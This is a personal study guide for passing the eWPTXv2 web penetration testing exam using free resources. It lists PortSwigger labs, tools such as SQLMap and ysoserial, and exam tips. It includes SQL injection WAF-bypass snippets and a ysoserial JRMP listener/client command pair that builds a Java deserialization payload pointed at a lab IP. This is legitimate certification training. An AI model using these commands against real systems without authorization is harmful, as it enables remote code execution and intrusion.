How I passed eWPTXv2 with Free courses only

Table of Contents

• Why did I create this guide?
• What and where to learn
• Required Tools
• Practice
• Useful Tips

Why did I create this guide?

I created this guide to answer the question: ‘Is it possible to pass the eWPTXv2 without paying for INE’s course?’ Yes, it is possible, and I’ll show you how I did it!

What and where to learn

I used the eWPTXv2 syllabus to make a list of topics to study.

You can use PortSwigger’s Academy to learn about most vulnerabilities:

• SQL Injection
• Authentication
  • OAuth
  • JWT Attacks
• Directory traversal
• Command Injection
• Information Disclosure
• Access Control
• SSRF
• XXE Injection
• XSS
• CORS
• CSRF
• Clickjacking
• SSTI
• API Testing
• GraphQL API
• Insecure deserialization

PortSwigger covers most of the material you need to learn. However, there are some additional things that I recommend studying as well:

• Learn how to bypass SQL Injection WAF. Example:
  • SELECT+1+ FROM users
  • SELECT/**/1/**/FROM/**/users
• Learn how to use SQLMap.
  • TryHackMe - SQLMap Room
  • TryHackMe - Gamezone
  • HackTricks - SQLMap
• Learn how to use ysoserial’s JRMP Listener/Client.
  • Usage example:

//The JRMPClient causes the server to try establishing a TCP connection to the supplied IP address.
// 1.  Start the JRMPListener:
sudo java11 -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 80 CommonsCollections1 "ping -c 5 10.100.13.200"
// 2.  Create a payload with JRMPClient:
sudo java11 -jar ysoserial-all.jar "JRMPClient" "10.100.13.200:80" | base64 -w0

Required Tools

You need to learn the tools below to pass the exam:

• Burp Suite Community
• Any directory brute-forcer you like: ffuf, gobuster, etc…
• SQLMap
• ysoserial

Practice

Below is a list of labs I used to prepare for the exam:

• Business Logic Vulnerabilities

  • Authentication bypass via flawed state machine
  • Inconsistent security controls
  • Authentication bypass via encryption oracle

• DOM-Based Vulns

  • DOM XSS using web messages and a JavaScript URL

  • DOM-based open redirection

  • DOM-based cookie manipulation

• Information disclosure

  • Authentication bypass via information disclosure
  • Information disclosure in version control history
• OS Command Injection
  • Blind OS command injection with output redirection

• File upload vulnerabilities

  • Web shell upload via extension blacklist bypass
  • Web shell upload via obfuscated file extension
• Path Traversal
  • File path traversal, traversal sequences stripped non-recursively

• Access Control

  • User ID controlled by request parameter with password disclosure
  • Multi-step process with no access control on one step
  • Referer-based access control

• Authentication Vulnerabilities

  • Broken brute-force protection, IP block

  • Password reset poisoning via middleware

  • Brute-forcing a stay-logged-in cookie

• Business Logic Vulnerabilities

  • Authentication bypass via flawed state machine
  • Inconsistent security controls
  • Authentication bypass via encryption oracle

• JWT Attacks

  • JWT authentication bypass via kid header path traversal
  • JWT authentication bypass via weak signing key

• GraphQL API

  • Bypassing GraphQL brute force protections
  • Performing CSRF exploits over GraphQL

• API Testing

  • Exploiting server-side parameter pollution in a query string

  • Exploiting an API endpoint using documentation

• OAuth authentication

  • OAuth account hijacking via redirect_uri
  • Forced OAuth profile linking
• SQL Injection
  • I Recommend doing this manually and using SQLMap.
  • Querying the database type and version on MySQL and Microsoft
  • SQL injection UNION attack, retrieving data from other tables
  • Blind SQL injection with time delays and information retrieval
  • Blind SQL injection with out-of-band data exfiltration
  • SQL injection with filter bypass via XML encoding

• XSS

  • Use XSS to capture passwords
  • Exploiting XSS to perform CSRF
  • Exploiting XSS to steal cookies

• CSRF

  • CSRF where token validation depends on request method

• XXE

  • Blind XXE with out-of-band interaction via XML parameter entities
  • Exploiting blind XXE to exfiltrate data using a malicious external DTD
  • Exploiting XXE via image file upload
• Clickjacking
  • Multistep clickjacking
• CORS
  • CORS vulnerability with trusted insecure protocols
• SSTI
  • Server-side template injection in an unknown language with a documented exploit

• SSRF

  • SSRF with filter bypass via open redirection vulnerability

  • SSRF with blacklist-based input filter

• Insecure Deserialization

  • Modifying serialized data types
  • Using application functionality  o exploit insecure deserialization
  • Exploiting Java deserialization with Apache Commons

Useful Tips

• If you see an SSRF vulnerability, try to chain it with SSTI or Java Deserialization to gain RCE.

• The lab environment isn’t very stable, so take screenshots of the vulnerabilities you find immediately. This is important because you need to write a report at the end. I actually failed my first attempt because I couldn’t replicate two critical vulnerabilities, so I couldn’t take the required screenshots.

• You tried to exploit the X vulnerability during the exam, but it didn’t work. If you’re sure about the payload you sent, don’t forget to restart the lab environment.

• To pass the exam, you need to fully exploit every identified vulnerability. For example, if you find a SQL injection vulnerability, you need to exploit it to dump the database.

• I recommend creating a report template in Sysreport, so you only need to insert the vulnerabilities you find during the exam. This made the process of writing a report much quicker for me.

After following all the steps above, you should now be able to pass the eWPTXv2 exam. Best of luck!